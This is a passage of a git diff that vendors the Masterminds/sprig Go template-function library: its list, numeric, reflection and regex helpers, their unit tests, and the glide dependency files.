+	assert.NoError(t, runt(`{{ snakecase "NoHTTPS" }}`, "no_https"))
+	assert.NoError(t, runt(`{{ snakecase "GO_PATH" }}`, "go_path"))
+	assert.NoError(t, runt(`{{ snakecase "GO PATH" }}`, "go_path"))
+	assert.NoError(t, runt(`{{ snakecase "GO-PATH" }}`, "go_path"))
+}
+
+func TestCamelCase(t *testing.T) {
+	assert.NoError(t, runt(`{{ camelcase "http_server" }}`, "HttpServer"))
+	assert.NoError(t, runt(`{{ camelcase "_camel_case" }}`, "_CamelCase"))
+	assert.NoError(t, runt(`{{ camelcase "no_https" }}`, "NoHttps"))
+	assert.NoError(t, runt(`{{ camelcase "_complex__case_" }}`, "_Complex_Case_"))
+	assert.NoError(t, runt(`{{ camelcase "all" }}`, "All"))
+}
+
+func TestShuffle(t *testing.T) {
+	goutils.RANDOM = rand.New(rand.NewSource(1))
+	// Because we're using a random number generator, we need these to go in
+	// a predictable sequence:
+	assert.NoError(t, runt(`{{ shuffle "Hello World" }}`, "rldo HWlloe"))
+}
+
+// runt runs a template and checks that the output exactly matches the expected string.
+func runt(tpl, expect string) error {
+	return runtv(tpl, expect, map[string]string{})
+}
+
+// runtv takes a template, and expected return, and values for substitution.
+//
+// It runs the template and verifies that the output is an exact match.
+func runtv(tpl, expect string, vars interface{}) error {
+	fmap := TxtFuncMap()
+	t := template.Must(template.New("test").Funcs(fmap).Parse(tpl))
+	var b bytes.Buffer
+	err := t.Execute(&b, vars)
+	if err != nil {
+		return err
+	}
+	if expect != b.String() {
+		return fmt.Errorf("Expected '%s', got '%s'", expect, b.String())
+	}
+	return nil
+}
+
+// runRaw runs a template with the given variables and returns the result.
+func runRaw(tpl string, vars interface{}) (string, error) {
+	fmap := TxtFuncMap()
+	t := template.Must(template.New("test").Funcs(fmap).Parse(tpl))
+	var b bytes.Buffer
+	err := t.Execute(&b, vars)
+	if err != nil {
+		return "", err
+	}
+	return b.String(), nil
+}
diff --git a/vendor/github.com/Masterminds/sprig/glide.lock b/vendor/github.com/Masterminds/sprig/glide.lock
new file mode 100644
index 0000000000..34afeb9c37
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/glide.lock
@@ -0,0 +1,33 @@
+hash: 770b6a1132b743dadf6a0bb5fb8bf7083b1a5209f6d6c07826234ab2a97aade9
+updated: 2018-04-02T23:08:56.947456531+02:00
+imports:
+- name: github.com/aokoli/goutils
+  version: 9c37978a95bd5c709a15883b6242714ea6709e64
+- name: github.com/google/uuid
+  version: 064e2069ce9c359c118179501254f67d7d37ba24
+- name: github.com/huandu/xstrings
+  version: 3959339b333561bf62a38b424fd41517c2c90f40
+- name: github.com/imdario/mergo
+  version: 7fe0c75c13abdee74b09fcacef5ea1c6bba6a874
+- name: github.com/Masterminds/goutils
+  version: 3391d3790d23d03408670993e957e8f408993c34
+- name: github.com/Masterminds/semver
+  version: 59c29afe1a994eacb71c833025ca7acf874bb1da
+- name: github.com/stretchr/testify
+  version: e3a8ff8ce36581f87a15341206f205b1da467059
+  subpackages:
+  - assert
+- name: golang.org/x/crypto
+  version: d172538b2cfce0c13cee31e647d0367aa8cd2486
+  subpackages:
+  - pbkdf2
+  - scrypt
+testImports:
+- name: github.com/davecgh/go-spew
+  version: 5215b55f46b2b919f50a1df0eaa5886afe4e3b3d
+  subpackages:
+  - spew
+- name: github.com/pmezard/go-difflib
+  version: d8ed2627bdf02c080bf22230dbb337003b7aba2d
+  subpackages:
+  - difflib
diff --git a/vendor/github.com/Masterminds/sprig/glide.yaml b/vendor/github.com/Masterminds/sprig/glide.yaml
new file mode 100644
index 0000000000..772ba91344
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/glide.yaml
@@ -0,0 +1,15 @@
+package: github.com/Masterminds/sprig
+import:
+- package: github.com/Masterminds/goutils
+  version: ^1.0.0
+- package: github.com/google/uuid
+  version: ^0.2
+- package: golang.org/x/crypto
+  subpackages:
+  - scrypt
+- package: github.com/Masterminds/semver
+  version: v1.2.2
+- package: github.com/stretchr/testify
+- package: github.com/imdario/mergo
+  version: ~0.2.2
+- package: github.com/huandu/xstrings
diff --git a/vendor/github.com/Masterminds/sprig/list.go b/vendor/github.com/Masterminds/sprig/list.go
new file mode 100644
index 0000000000..1860549a94
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/list.go
@@ -0,0 +1,259 @@
+package sprig
+
+import (
+	"fmt"
+	"reflect"
+	"sort"
+)
+
+// Reflection is used in these functions so that slices and arrays of strings,
+// ints, and other types not implementing []interface{} can be worked with.
+// For example, this is useful if you need to work on the output of regexs.
+
+func list(v ...interface{}) []interface{} {
+	return v
+}
+
+func push(list interface{}, v interface{}) []interface{} {
+	tp := reflect.TypeOf(list).Kind()
+	switch tp {
+	case reflect.Slice, reflect.Array:
+		l2 := reflect.ValueOf(list)
+
+		l := l2.Len()
+		nl := make([]interface{}, l)
+		for i := 0; i < l; i++ {
+			nl[i] = l2.Index(i).Interface()
+		}
+
+		return append(nl, v)
+
+	default:
+		panic(fmt.Sprintf("Cannot push on type %s", tp))
+	}
+}
+
+func prepend(list interface{}, v interface{}) []interface{} {
+	//return append([]interface{}{v}, list...)
+
+	tp := reflect.TypeOf(list).Kind()
+	switch tp {
+	case reflect.Slice, reflect.Array:
+		l2 := reflect.ValueOf(list)
+
+		l := l2.Len()
+		nl := make([]interface{}, l)
+		for i := 0; i < l; i++ {
+			nl[i] = l2.Index(i).Interface()
+		}
+
+		return append([]interface{}{v}, nl...)
+
+	default:
+		panic(fmt.Sprintf("Cannot prepend on type %s", tp))
+	}
+}
+
+func last(list interface{}) interface{} {
+	tp := reflect.TypeOf(list).Kind()
+	switch tp {
+	case reflect.Slice, reflect.Array:
+		l2 := reflect.ValueOf(list)
+
+		l := l2.Len()
+		if l == 0 {
+			return nil
+		}
+
+		return l2.Index(l - 1).Interface()
+	default:
+		panic(fmt.Sprintf("Cannot find last on type %s", tp))
+	}
+}
+
+func first(list interface{}) interface{} {
+	tp := reflect.TypeOf(list).Kind()
+	switch tp {
+	case reflect.Slice, reflect.Array:
+		l2 := reflect.ValueOf(list)
+
+		l := l2.Len()
+		if l == 0 {
+			return nil
+		}
+
+		return l2.Index(0).Interface()
+	default:
+		panic(fmt.Sprintf("Cannot find first on type %s", tp))
+	}
+}
+
+func rest(list interface{}) []interface{} {
+	tp := reflect.TypeOf(list).Kind()
+	switch tp {
+	case reflect.Slice, reflect.Array:
+		l2 := reflect.ValueOf(list)
+
+		l := l2.Len()
+		if l == 0 {
+			return nil
+		}
+
+		nl := make([]interface{}, l-1)
+		for i := 1; i < l; i++ {
+			nl[i-1] = l2.Index(i).Interface()
+		}
+
+		return nl
+	default:
+		panic(fmt.Sprintf("Cannot find rest on type %s", tp))
+	}
+}
+
+func initial(list interface{}) []interface{} {
+	tp := reflect.TypeOf(list).Kind()
+	switch tp {
+	case reflect.Slice, reflect.Array:
+		l2 := reflect.ValueOf(list)
+
+		l := l2.Len()
+		if l == 0 {
+			return nil
+		}
+
+		nl := make([]interface{}, l-1)
+		for i := 0; i < l-1; i++ {
+			nl[i] = l2.Index(i).Interface()
+		}
+
+		return nl
+	default:
+		panic(fmt.Sprintf("Cannot find initial on type %s", tp))
+	}
+}
+
+func sortAlpha(list interface{}) []string {
+	k := reflect.Indirect(reflect.ValueOf(list)).Kind()
+	switch k {
+	case reflect.Slice, reflect.Array:
+		a := strslice(list)
+		s := sort.StringSlice(a)
+		s.Sort()
+		return s
+	}
+	return []string{strval(list)}
+}
+
+func reverse(v interface{}) []interface{} {
+	tp := reflect.TypeOf(v).Kind()
+	switch tp {
+	case reflect.Slice, reflect.Array:
+		l2 := reflect.ValueOf(v)
+
+		l := l2.Len()
+		// We do not sort in place because the incoming array should not be altered.
+		nl := make([]interface{}, l)
+		for i := 0; i < l; i++ {
+			nl[l-i-1] = l2.Index(i).Interface()
+		}
+
+		return nl
+	default:
+		panic(fmt.Sprintf("Cannot find reverse on type %s", tp))
+	}
+}
+
+func compact(list interface{}) []interface{} {
+	tp := reflect.TypeOf(list).Kind()
+	switch tp {
+	case reflect.Slice, reflect.Array:
+		l2 := reflect.ValueOf(list)
+
+		l := l2.Len()
+		nl := []interface{}{}
+		var item interface{}
+		for i := 0; i < l; i++ {
+			item = l2.Index(i).Interface()
+			if !empty(item) {
+				nl = append(nl, item)
+			}
+		}
+
+		return nl
+	default:
+		panic(fmt.Sprintf("Cannot compact on type %s", tp))
+	}
+}
+
+func uniq(list interface{}) []interface{} {
+	tp := reflect.TypeOf(list).Kind()
+	switch tp {
+	case reflect.Slice, reflect.Array:
+		l2 := reflect.ValueOf(list)
+
+		l := l2.Len()
+		dest := []interface{}{}
+		var item interface{}
+		for i := 0; i < l; i++ {
+			item = l2.Index(i).Interface()
+			if !inList(dest, item) {
+				dest = append(dest, item)
+			}
+		}
+
+		return dest
+	default:
+		panic(fmt.Sprintf("Cannot find uniq on type %s", tp))
+	}
+}
+
+func inList(haystack []interface{}, needle interface{}) bool {
+	for _, h := range haystack {
+		if reflect.DeepEqual(needle, h) {
+			return true
+		}
+	}
+	return false
+}
+
+func without(list interface{}, omit ...interface{}) []interface{} {
+	tp := reflect.TypeOf(list).Kind()
+	switch tp {
+	case reflect.Slice, reflect.Array:
+		l2 := reflect.ValueOf(list)
+
+		l := l2.Len()
+		res := []interface{}{}
+		var item interface{}
+		for i := 0; i < l; i++ {
+			item = l2.Index(i).Interface()
+			if !inList(omit, item) {
+				res = append(res, item)
+			}
+		}
+
+		return res
+	default:
+		panic(fmt.Sprintf("Cannot find without on type %s", tp))
+	}
+}
+
+func has(needle interface{}, haystack interface{}) bool {
+	tp := reflect.TypeOf(haystack).Kind()
+	switch tp {
+	case reflect.Slice, reflect.Array:
+		l2 := reflect.ValueOf(haystack)
+		var item interface{}
+		l := l2.Len()
+		for i := 0; i < l; i++ {
+			item = l2.Index(i).Interface()
+			if reflect.DeepEqual(needle, item) {
+				return true
+			}
+		}
+
+		return false
+	default:
+		panic(fmt.Sprintf("Cannot find has on type %s", tp))
+	}
+}
diff --git a/vendor/github.com/Masterminds/sprig/list_test.go b/vendor/github.com/Masterminds/sprig/list_test.go
new file mode 100644
index 0000000000..fa4cc76e57
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/list_test.go
@@ -0,0 +1,157 @@
+package sprig
+
+import (
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+)
+
+func TestTuple(t *testing.T) {
+	tpl := `{{$t := tuple 1 "a" "foo"}}{{index $t 2}}{{index $t 0 }}{{index $t 1}}`
+	if err := runt(tpl, "foo1a"); err != nil {
+		t.Error(err)
+	}
+}
+
+func TestList(t *testing.T) {
+	tpl := `{{$t := list 1 "a" "foo"}}{{index $t 2}}{{index $t 0 }}{{index $t 1}}`
+	if err := runt(tpl, "foo1a"); err != nil {
+		t.Error(err)
+	}
+}
+
+func TestPush(t *testing.T) {
+	// Named `append` in the function map
+	tests := map[string]string{
+		`{{ $t := tuple 1 2 3  }}{{ append $t 4 | len }}`:                             "4",
+		`{{ $t := tuple 1 2 3 4  }}{{ append $t 5 | join "-" }}`:                      "1-2-3-4-5",
+		`{{ $t := regexSplit "/" "foo/bar/baz" -1 }}{{ append $t "qux" | join "-" }}`: "foo-bar-baz-qux",
+	}
+	for tpl, expect := range tests {
+		assert.NoError(t, runt(tpl, expect))
+	}
+}
+func TestPrepend(t *testing.T) {
+	tests := map[string]string{
+		`{{ $t := tuple 1 2 3  }}{{ prepend $t 0 | len }}`:                             "4",
+		`{{ $t := tuple 1 2 3 4  }}{{ prepend $t 0 | join "-" }}`:                      "0-1-2-3-4",
+		`{{ $t := regexSplit "/" "foo/bar/baz" -1 }}{{ prepend $t "qux" | join "-" }}`: "qux-foo-bar-baz",
+	}
+	for tpl, expect := range tests {
+		assert.NoError(t, runt(tpl, expect))
+	}
+}
+
+func TestFirst(t *testing.T) {
+	tests := map[string]string{
+		`{{ list 1 2 3 | first }}`:                          "1",
+		`{{ list | first }}`:                                "<no value>",
+		`{{ regexSplit "/src/" "foo/src/bar" -1 | first }}`: "foo",
+	}
+	for tpl, expect := range tests {
+		assert.NoError(t, runt(tpl, expect))
+	}
+}
+func TestLast(t *testing.T) {
+	tests := map[string]string{
+		`{{ list 1 2 3 | last }}`:                          "3",
+		`{{ list | last }}`:                                "<no value>",
+		`{{ regexSplit "/src/" "foo/src/bar" -1 | last }}`: "bar",
+	}
+	for tpl, expect := range tests {
+		assert.NoError(t, runt(tpl, expect))
+	}
+}
+
+func TestInitial(t *testing.T) {
+	tests := map[string]string{
+		`{{ list 1 2 3 | initial | len }}`:                "2",
+		`{{ list 1 2 3 | initial | last }}`:               "2",
+		`{{ list 1 2 3 | initial | first }}`:              "1",
+		`{{ list | initial }}`:                            "[]",
+		`{{ regexSplit "/" "foo/bar/baz" -1 | initial }}`: "[foo bar]",
+	}
+	for tpl, expect := range tests {
+		assert.NoError(t, runt(tpl, expect))
+	}
+}
+
+func TestRest(t *testing.T) {
+	tests := map[string]string{
+		`{{ list 1 2 3 | rest | len }}`:                "2",
+		`{{ list 1 2 3 | rest | last }}`:               "3",
+		`{{ list 1 2 3 | rest | first }}`:              "2",
+		`{{ list | rest }}`:                            "[]",
+		`{{ regexSplit "/" "foo/bar/baz" -1 | rest }}`: "[bar baz]",
+	}
+	for tpl, expect := range tests {
+		assert.NoError(t, runt(tpl, expect))
+	}
+}
+
+func TestReverse(t *testing.T) {
+	tests := map[string]string{
+		`{{ list 1 2 3 | reverse | first }}`:              "3",
+		`{{ list 1 2 3 | reverse | rest | first }}`:       "2",
+		`{{ list 1 2 3 | reverse | last }}`:               "1",
+		`{{ list 1 2 3 4 | reverse }}`:                    "[4 3 2 1]",
+		`{{ list 1 | reverse }}`:                          "[1]",
+		`{{ list | reverse }}`:                            "[]",
+		`{{ regexSplit "/" "foo/bar/baz" -1 | reverse }}`: "[baz bar foo]",
+	}
+	for tpl, expect := range tests {
+		assert.NoError(t, runt(tpl, expect))
+	}
+}
+
+func TestCompact(t *testing.T) {
+	tests := map[string]string{
+		`{{ list 1 0 "" "hello" | compact }}`:          `[1 hello]`,
+		`{{ list "" "" | compact }}`:                   `[]`,
+		`{{ list | compact }}`:                         `[]`,
+		`{{ regexSplit "/" "foo//bar" -1 | compact }}`: "[foo bar]",
+	}
+	for tpl, expect := range tests {
+		assert.NoError(t, runt(tpl, expect))
+	}
+}
+
+func TestUniq(t *testing.T) {
+	tests := map[string]string{
+		`{{ list 1 2 3 4 | uniq }}`:                    `[1 2 3 4]`,
+		`{{ list "a" "b" "c" "d" | uniq }}`:            `[a b c d]`,
+		`{{ list 1 1 1 1 2 2 2 2 | uniq }}`:            `[1 2]`,
+		`{{ list "foo" 1 1 1 1 "foo" "foo" | uniq }}`:  `[foo 1]`,
+		`{{ list | uniq }}`:                            `[]`,
+		`{{ regexSplit "/" "foo/foo/bar" -1 | uniq }}`: "[foo bar]",
+	}
+	for tpl, expect := range tests {
+		assert.NoError(t, runt(tpl, expect))
+	}
+}
+
+func TestWithout(t *testing.T) {
+	tests := map[string]string{
+		`{{ without (list 1 2 3 4) 1 }}`:                         `[2 3 4]`,
+		`{{ without (list "a" "b" "c" "d") "a" }}`:               `[b c d]`,
+		`{{ without (list 1 1 1 1 2) 1 }}`:                       `[2]`,
+		`{{ without (list) 1 }}`:                                 `[]`,
+		`{{ without (list 1 2 3) }}`:                             `[1 2 3]`,
+		`{{ without list }}`:                                     `[]`,
+		`{{ without (regexSplit "/" "foo/bar/baz" -1 ) "foo" }}`: "[bar baz]",
+	}
+	for tpl, expect := range tests {
+		assert.NoError(t, runt(tpl, expect))
+	}
+}
+
+func TestHas(t *testing.T) {
+	tests := map[string]string{
+		`{{ list 1 2 3 | has 1 }}`:                          `true`,
+		`{{ list 1 2 3 | has 4 }}`:                          `false`,
+		`{{ regexSplit "/" "foo/bar/baz" -1 | has "bar" }}`: `true`,
+	}
+	for tpl, expect := range tests {
+		assert.NoError(t, runt(tpl, expect))
+	}
+}
diff --git a/vendor/github.com/Masterminds/sprig/numeric.go b/vendor/github.com/Masterminds/sprig/numeric.go
new file mode 100644
index 0000000000..209c62e53a
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/numeric.go
@@ -0,0 +1,159 @@
+package sprig
+
+import (
+	"math"
+	"reflect"
+	"strconv"
+)
+
+// toFloat64 converts 64-bit floats
+func toFloat64(v interface{}) float64 {
+	if str, ok := v.(string); ok {
+		iv, err := strconv.ParseFloat(str, 64)
+		if err != nil {
+			return 0
+		}
+		return iv
+	}
+
+	val := reflect.Indirect(reflect.ValueOf(v))
+	switch val.Kind() {
+	case reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Int:
+		return float64(val.Int())
+	case reflect.Uint8, reflect.Uint16, reflect.Uint32:
+		return float64(val.Uint())
+	case reflect.Uint, reflect.Uint64:
+		return float64(val.Uint())
+	case reflect.Float32, reflect.Float64:
+		return val.Float()
+	case reflect.Bool:
+		if val.Bool() == true {
+			return 1
+		}
+		return 0
+	default:
+		return 0
+	}
+}
+
+func toInt(v interface{}) int {
+	//It's not optimal. Bud I don't want duplicate toInt64 code.
+	return int(toInt64(v))
+}
+
+// toInt64 converts integer types to 64-bit integers
+func toInt64(v interface{}) int64 {
+	if str, ok := v.(string); ok {
+		iv, err := strconv.ParseInt(str, 10, 64)
+		if err != nil {
+			return 0
+		}
+		return iv
+	}
+
+	val := reflect.Indirect(reflect.ValueOf(v))
+	switch val.Kind() {
+	case reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Int:
+		return val.Int()
+	case reflect.Uint8, reflect.Uint16, reflect.Uint32:
+		return int64(val.Uint())
+	case reflect.Uint, reflect.Uint64:
+		tv := val.Uint()
+		if tv <= math.MaxInt64 {
+			return int64(tv)
+		}
+		// TODO: What is the sensible thing to do here?
+		return math.MaxInt64
+	case reflect.Float32, reflect.Float64:
+		return int64(val.Float())
+	case reflect.Bool:
+		if val.Bool() == true {
+			return 1
+		}
+		return 0
+	default:
+		return 0
+	}
+}
+
+func max(a interface{}, i ...interface{}) int64 {
+	aa := toInt64(a)
+	for _, b := range i {
+		bb := toInt64(b)
+		if bb > aa {
+			aa = bb
+		}
+	}
+	return aa
+}
+
+func min(a interface{}, i ...interface{}) int64 {
+	aa := toInt64(a)
+	for _, b := range i {
+		bb := toInt64(b)
+		if bb < aa {
+			aa = bb
+		}
+	}
+	return aa
+}
+
+func until(count int) []int {
+	step := 1
+	if count < 0 {
+		step = -1
+	}
+	return untilStep(0, count, step)
+}
+
+func untilStep(start, stop, step int) []int {
+	v := []int{}
+
+	if stop < start {
+		if step >= 0 {
+			return v
+		}
+		for i := start; i > stop; i += step {
+			v = append(v, i)
+		}
+		return v
+	}
+
+	if step <= 0 {
+		return v
+	}
+	for i := start; i < stop; i += step {
+		v = append(v, i)
+	}
+	return v
+}
+
+func floor(a interface{}) float64 {
+	aa := toFloat64(a)
+	return math.Floor(aa)
+}
+
+func ceil(a interface{}) float64 {
+	aa := toFloat64(a)
+	return math.Ceil(aa)
+}
+
+func round(a interface{}, p int, r_opt ...float64) float64 {
+	roundOn := .5
+	if len(r_opt) > 0 {
+		roundOn = r_opt[0]
+	}
+	val := toFloat64(a)
+	places := toFloat64(p)
+
+	var round float64
+	pow := math.Pow(10, places)
+	digit := pow * val
+	_, div := math.Modf(digit)
+	if div >= roundOn {
+		round = math.Ceil(digit)
+	} else {
+		round = math.Floor(digit)
+	}
+	return round / pow
+}
\ No newline at end of file
diff --git a/vendor/github.com/Masterminds/sprig/numeric_test.go b/vendor/github.com/Masterminds/sprig/numeric_test.go
new file mode 100644
index 0000000000..2f41253052
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/numeric_test.go
@@ -0,0 +1,205 @@
+package sprig
+
+import (
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+)
+
+func TestUntil(t *testing.T) {
+	tests := map[string]string{
+		`{{range $i, $e := until 5}}{{$i}}{{$e}}{{end}}`:   "0011223344",
+		`{{range $i, $e := until -5}}{{$i}}{{$e}} {{end}}`: "00 1-1 2-2 3-3 4-4 ",
+	}
+	for tpl, expect := range tests {
+		if err := runt(tpl, expect); err != nil {
+			t.Error(err)
+		}
+	}
+}
+func TestUntilStep(t *testing.T) {
+	tests := map[string]string{
+		`{{range $i, $e := untilStep 0 5 1}}{{$i}}{{$e}}{{end}}`:     "0011223344",
+		`{{range $i, $e := untilStep 3 6 1}}{{$i}}{{$e}}{{end}}`:     "031425",
+		`{{range $i, $e := untilStep 0 -10 -2}}{{$i}}{{$e}} {{end}}`: "00 1-2 2-4 3-6 4-8 ",
+		`{{range $i, $e := untilStep 3 0 1}}{{$i}}{{$e}}{{end}}`:     "",
+		`{{range $i, $e := untilStep 3 99 0}}{{$i}}{{$e}}{{end}}`:    "",
+		`{{range $i, $e := untilStep 3 99 -1}}{{$i}}{{$e}}{{end}}`:   "",
+		`{{range $i, $e := untilStep 3 0 0}}{{$i}}{{$e}}{{end}}`:     "",
+	}
+	for tpl, expect := range tests {
+		if err := runt(tpl, expect); err != nil {
+			t.Error(err)
+		}
+	}
+
+}
+func TestBiggest(t *testing.T) {
+	tpl := `{{ biggest 1 2 3 345 5 6 7}}`
+	if err := runt(tpl, `345`); err != nil {
+		t.Error(err)
+	}
+
+	tpl = `{{ max 345}}`
+	if err := runt(tpl, `345`); err != nil {
+		t.Error(err)
+	}
+}
+func TestMin(t *testing.T) {
+	tpl := `{{ min 1 2 3 345 5 6 7}}`
+	if err := runt(tpl, `1`); err != nil {
+		t.Error(err)
+	}
+
+	tpl = `{{ min 345}}`
+	if err := runt(tpl, `345`); err != nil {
+		t.Error(err)
+	}
+}
+
+func TestToFloat64(t *testing.T) {
+	target := float64(102)
+	if target != toFloat64(int8(102)) {
+		t.Errorf("Expected 102")
+	}
+	if target != toFloat64(int(102)) {
+		t.Errorf("Expected 102")
+	}
+	if target != toFloat64(int32(102)) {
+		t.Errorf("Expected 102")
+	}
+	if target != toFloat64(int16(102)) {
+		t.Errorf("Expected 102")
+	}
+	if target != toFloat64(int64(102)) {
+		t.Errorf("Expected 102")
+	}
+	if target != toFloat64("102") {
+		t.Errorf("Expected 102")
+	}
+	if 0 != toFloat64("frankie") {
+		t.Errorf("Expected 0")
+	}
+	if target != toFloat64(uint16(102)) {
+		t.Errorf("Expected 102")
+	}
+	if target != toFloat64(uint64(102)) {
+		t.Errorf("Expected 102")
+	}
+	if 102.1234 != toFloat64(float64(102.1234)) {
+		t.Errorf("Expected 102.1234")
+	}
+	if 1 != toFloat64(true) {
+		t.Errorf("Expected 102")
+	}
+}
+func TestToInt64(t *testing.T) {
+	target := int64(102)
+	if target != toInt64(int8(102)) {
+		t.Errorf("Expected 102")
+	}
+	if target != toInt64(int(102)) {
+		t.Errorf("Expected 102")
+	}
+	if target != toInt64(int32(102)) {
+		t.Errorf("Expected 102")
+	}
+	if target != toInt64(int16(102)) {
+		t.Errorf("Expected 102")
+	}
+	if target != toInt64(int64(102)) {
+		t.Errorf("Expected 102")
+	}
+	if target != toInt64("102") {
+		t.Errorf("Expected 102")
+	}
+	if 0 != toInt64("frankie") {
+		t.Errorf("Expected 0")
+	}
+	if target != toInt64(uint16(102)) {
+		t.Errorf("Expected 102")
+	}
+	if target != toInt64(uint64(102)) {
+		t.Errorf("Expected 102")
+	}
+	if target != toInt64(float64(102.1234)) {
+		t.Errorf("Expected 102")
+	}
+	if 1 != toInt64(true) {
+		t.Errorf("Expected 102")
+	}
+}
+
+func TestToInt(t *testing.T) {
+	target := int(102)
+	if target != toInt(int8(102)) {
+		t.Errorf("Expected 102")
+	}
+	if target != toInt(int(102)) {
+		t.Errorf("Expected 102")
+	}
+	if target != toInt(int32(102)) {
+		t.Errorf("Expected 102")
+	}
+	if target != toInt(int16(102)) {
+		t.Errorf("Expected 102")
+	}
+	if target != toInt(int64(102)) {
+		t.Errorf("Expected 102")
+	}
+	if target != toInt("102") {
+		t.Errorf("Expected 102")
+	}
+	if 0 != toInt("frankie") {
+		t.Errorf("Expected 0")
+	}
+	if target != toInt(uint16(102)) {
+		t.Errorf("Expected 102")
+	}
+	if target != toInt(uint64(102)) {
+		t.Errorf("Expected 102")
+	}
+	if target != toInt(float64(102.1234)) {
+		t.Errorf("Expected 102")
+	}
+	if 1 != toInt(true) {
+		t.Errorf("Expected 102")
+	}
+}
+
+func TestAdd(t *testing.T) {
+	tpl := `{{ 3 | add 1 2}}`
+	if err := runt(tpl, `6`); err != nil {
+		t.Error(err)
+	}
+}
+
+func TestMul(t *testing.T) {
+	tpl := `{{ 1 | mul "2" 3 "4"}}`
+	if err := runt(tpl, `24`); err != nil {
+		t.Error(err)
+	}
+}
+
+func TestCeil(t *testing.T){
+	assert.Equal(t, 123.0, ceil(123))
+	assert.Equal(t, 123.0, ceil("123"))
+	assert.Equal(t, 124.0, ceil(123.01))
+	assert.Equal(t, 124.0, ceil("123.01"))
+}
+
+func TestFloor(t *testing.T){
+	assert.Equal(t, 123.0, floor(123))
+	assert.Equal(t, 123.0, floor("123"))
+	assert.Equal(t, 123.0, floor(123.9999))
+	assert.Equal(t, 123.0, floor("123.9999"))
+}
+
+func TestRound(t *testing.T){
+	assert.Equal(t, 123.556, round(123.5555, 3))
+	assert.Equal(t, 123.556, round("123.55555", 3))
+	assert.Equal(t, 124.0, round(123.500001, 0))
+	assert.Equal(t, 123.0, round(123.49999999, 0))
+	assert.Equal(t, 123.23, round(123.2329999, 2, .3))
+	assert.Equal(t, 123.24, round(123.233, 2, .3))
+}
diff --git a/vendor/github.com/Masterminds/sprig/reflect.go b/vendor/github.com/Masterminds/sprig/reflect.go
new file mode 100644
index 0000000000..8a65c132f0
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/reflect.go
@@ -0,0 +1,28 @@
+package sprig
+
+import (
+	"fmt"
+	"reflect"
+)
+
+// typeIs returns true if the src is the type named in target.
+func typeIs(target string, src interface{}) bool {
+	return target == typeOf(src)
+}
+
+func typeIsLike(target string, src interface{}) bool {
+	t := typeOf(src)
+	return target == t || "*"+target == t
+}
+
+func typeOf(src interface{}) string {
+	return fmt.Sprintf("%T", src)
+}
+
+func kindIs(target string, src interface{}) bool {
+	return target == kindOf(src)
+}
+
+func kindOf(src interface{}) string {
+	return reflect.ValueOf(src).Kind().String()
+}
diff --git a/vendor/github.com/Masterminds/sprig/reflect_test.go b/vendor/github.com/Masterminds/sprig/reflect_test.go
new file mode 100644
index 0000000000..515fae9c4f
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/reflect_test.go
@@ -0,0 +1,73 @@
+package sprig
+
+import (
+	"testing"
+)
+
+type fixtureTO struct {
+	Name, Value string
+}
+
+func TestTypeOf(t *testing.T) {
+	f := &fixtureTO{"hello", "world"}
+	tpl := `{{typeOf .}}`
+	if err := runtv(tpl, "*sprig.fixtureTO", f); err != nil {
+		t.Error(err)
+	}
+}
+
+func TestKindOf(t *testing.T) {
+	tpl := `{{kindOf .}}`
+
+	f := fixtureTO{"hello", "world"}
+	if err := runtv(tpl, "struct", f); err != nil {
+		t.Error(err)
+	}
+
+	f2 := []string{"hello"}
+	if err := runtv(tpl, "slice", f2); err != nil {
+		t.Error(err)
+	}
+
+	var f3 *fixtureTO = nil
+	if err := runtv(tpl, "ptr", f3); err != nil {
+		t.Error(err)
+	}
+}
+
+func TestTypeIs(t *testing.T) {
+	f := &fixtureTO{"hello", "world"}
+	tpl := `{{if typeIs "*sprig.fixtureTO" .}}t{{else}}f{{end}}`
+	if err := runtv(tpl, "t", f); err != nil {
+		t.Error(err)
+	}
+
+	f2 := "hello"
+	if err := runtv(tpl, "f", f2); err != nil {
+		t.Error(err)
+	}
+}
+func TestTypeIsLike(t *testing.T) {
+	f := "foo"
+	tpl := `{{if typeIsLike "string" .}}t{{else}}f{{end}}`
+	if err := runtv(tpl, "t", f); err != nil {
+		t.Error(err)
+	}
+
+	// Now make a pointer. Should still match.
+	f2 := &f
+	if err := runtv(tpl, "t", f2); err != nil {
+		t.Error(err)
+	}
+}
+func TestKindIs(t *testing.T) {
+	f := &fixtureTO{"hello", "world"}
+	tpl := `{{if kindIs "ptr" .}}t{{else}}f{{end}}`
+	if err := runtv(tpl, "t", f); err != nil {
+		t.Error(err)
+	}
+	f2 := "hello"
+	if err := runtv(tpl, "f", f2); err != nil {
+		t.Error(err)
+	}
+}
diff --git a/vendor/github.com/Masterminds/sprig/regex.go b/vendor/github.com/Masterminds/sprig/regex.go
new file mode 100644
index 0000000000..9fe033a6bd
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/regex.go
@@ -0,0 +1,35 @@
+package sprig
+
+import (
+	"regexp"
+)
+
+func regexMatch(regex string, s string) bool {
+	match, _ := regexp.MatchString(regex, s)
+	return match
+}
+
+func regexFindAll(regex string, s string, n int) []string {
+	r := regexp.MustCompile(regex)
+	return r.FindAllString(s, n)
+}
+
+func regexFind(regex string, s string) string {
+	r := regexp.MustCompile(regex)
+	return r.FindString(s)
+}
+
+func regexReplaceAll(regex string, s string, repl string) string {
+	r := regexp.MustCompile(regex)
+	return r.ReplaceAllString(s, repl)
+}
+
+func regexReplaceAllLiteral(regex string, s string, repl string) string {
+	r := regexp.MustCompile(regex)
+	return r.ReplaceAllLiteralString(s, repl)
+}
+
+func regexSplit(regex string, s string, n int) []string {
+	r := regexp.MustCompile(regex)
+	return r.Split(s, n)
+}
\ No newline at end of file
diff --git a/vendor/github.com/Masterminds/sprig/regex_test.go b/vendor/github.com/Masterminds/sprig/regex_test.go
new file mode 100644
index 0000000000..ccb87fe2f5
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/regex_test.go
@@ -0,0 +1,61 @@
+package sprig
+
+import (
